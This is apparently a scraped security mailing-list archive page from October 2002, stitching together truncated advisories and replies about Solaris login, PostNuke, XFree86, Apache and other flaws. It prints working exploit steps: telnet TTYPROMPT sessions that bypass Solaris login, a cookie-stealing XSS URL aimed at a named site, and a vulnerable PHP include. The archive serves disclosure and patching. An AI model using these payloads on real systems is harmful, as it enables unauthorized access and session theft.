On Wed, 02 Oct 2002, you wrote:
But, the remote setting of TTYPROMPT does matter. you can not succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
I have heard several conflicting reports on this matter and there
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
++
| EnGarde Secure Linux Security AdvisoryOctober 03, 2002 |
| http://www.engardelinux.org/ ESA-20021003-021
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
++
| EnGarde Secure Linux Security AdvisoryOctober 03, 2002 |
| http://www.engardelinux.org/ ESA-20021003-022
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
GENTOO LINUX SECURITY ANNOUNCEMENT
- -
PACKAGE :gv
SUMMARY :Execution of Arbitrary Shell
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- --
PACKAGE : XFree86
SUMMARY : Local vulnerabilities
I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:
on the url http://news.postnuke.com/modules.php
the get
?op=modloadname=Newsfile=articlesid=scriptalert(document.cookie);/script+
Best Regars,
Works like a champ on Solaris 2.6/Sparc:
-- begin --
~ $ telnet
telnet environ define TTYPROMPT abcdef
telnet o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.6
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
In-Reply-To: [EMAIL PROTECTED]
This exploit can also be done local to gain higher priv's
tester#TTYPROMPT=aa;export TTYPROMPT
tester#exec login
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c/n
tester:bin#
Patches to resolve
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
Hello,
Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT. This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
However, a very simple
how can you get rid of Commonname?
Cheers
-Original Message-
From: Eric Stevens [mailto:[EMAIL PROTECTED]]
Sent: Thu, October 03, 2002 3:10 PM
To: Bugtraq; [EMAIL PROTECTED]
Subject: CommonName Toolbar potentially exposes LAN web addresses
Due to a bug in the URL validation done in
Sorry but I can't reproduce this on a Solaris 7 machine.
sunlight.ccs% telnet
telnet environ define TTYPROMPT abcdef
telnet o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SunOS 5.7
login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c
In fact, I noticed the Resolve Local Intranet Names option, altering its
setting had no noticeable effect on behavior.
Further, I ran the uninstaller with all other applications closed, and
although the options for CommonName were removed from within Internet
Explorer, local addresses were still
NGSSoftware Insight Security Research Advisory
Name: Windows Help System Buffer Overflow
Systems: Windows XP,2000,NT,ME and 98
Severity: High Risk
Category: Buffer Overflow Vulnerability
Vendor URL: http://www.microsoft.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL:
Discovered:
2002-09-08, Ximian has been informed on 2002-09-09.
Impact:
medium, if SSL (IMAPS, SMTPS, POP3S) used
none, if not
Affected:
Ximian Evolution 1.0.x and earlier
Description:
Due to missing SSL validation code, Evolution's camel component is
vulnerable to common SSL man-in-the-middle
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -
GENTOO LINUX SECURITY ANNOUNCEMENT
- -
PACKAGE :python
SUMMARY :os.execvpe() vulnerability
The cumulative patch at
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS
02-056.asp addresses 4 vulnerabilities in SQL Server 7 and 2000. Dave
Aitel's (www.immunitysec.com) hello bug (unauthenticated buffer overflow
during authentication) is patched here.
Also
On Wed, 2 Oct 2002, buzheng wrote:
I do not think this is a new bug.
I completely agree.
But, the remote setting of TTYPROMPT does matter. you can not succeed in
login without remotely changing the TTYPROMPT. This is also the bug
mentioned in Jonathan's original letter (bid:5531).
That's
People in Immunity's Vulnerability Disclosure Club or people who have
purchased CORE Impact or people who have written their own SQL Server
Hello exploit can verify that this statement from the Microsoft Advisory
is, in fact, completely untrue.
The default install, in fact, every install I've
Another thing, if you tcpwrap your telnet sessions, you can prevent
localhost telnets.
Ramon Kagan
York University, Computing and Network Services
Unix Team - Intermediate System Administrator
(416)736-2100 #20263
[EMAIL PROTECTED]
-
I have not failed. I
Hi.
On June 28th, DigitalFactory has alienate part of linux
business. And now, SP, Inc. is selling Kondara MNU/Linux.
Press release from DigitalFactory (Japanese Language Only):
http://www.digitalfactory.co.jp/news/press/020628.html
After that, Kondara Project, which is development project of
It may be worth noting that the 2.0 and 2.1 releases are also
vulnerable, however 1.0 does not seem to be (getting worse, as 4.x
introduces a drop-down list of user names to choose from as well).
Also, it runs on some systems on port 49400 and https on 2381 (as well
as the 2301 mentioned below).
Apparently, Dave Ahmad wrote:
%
% These may be fixes for this vulnerablity, however they apply to telnetd
% and this vulnerability has to be in login.
So it makes more sense to apply the right patches to login, and not
patches to telnetd. If you only want to install the necessary patches
to
In-Reply-To: [EMAIL PROTECTED]
As it turns out the Postnuke issue in particular is a red herring.
As the lead developer describes it -- the cookie generated is a local
site cookie that is sandboxed within the confines of the
browser/session.
It is not the remote user's cookie.
The
On Wed, 2 Oct 2002 16:14:45 -0400, David Endler [EMAIL PROTECTED] said:
David This issue potentially affects any Net-SNMP installation in
David which the public read-only community string has not been
David changed.
net-snmp does not release packages with a pre-configured public
community
I just checked it again :
http://news.postnuke.com/modules.php?op=modloadname=Newsfile=articlesid=script+alert(document.cookie);/script
where + denotes a blank space or similarly this one:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
iDEFENSE Security Advisory 10.03.2002
Apache 1.3.x shared memory scoreboard vulnerabilities
16:00 GMT, October 3, 2002
I. BACKGROUND
The Apache Software Foundation's HTTP Server is an effort to develop
and maintain an open-source HTTP server for
-
Class : input Validation Error
Risk :Due to the simplicity of the attack and the number of sites
that run module books the risk is classified as Medium to
High.
URL:
Informations :
°°
Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°
/include/customize.php
?
$langfile = $l;
include $l;
?
/include/customize.php
Exploit :
28 matches
Mail list logo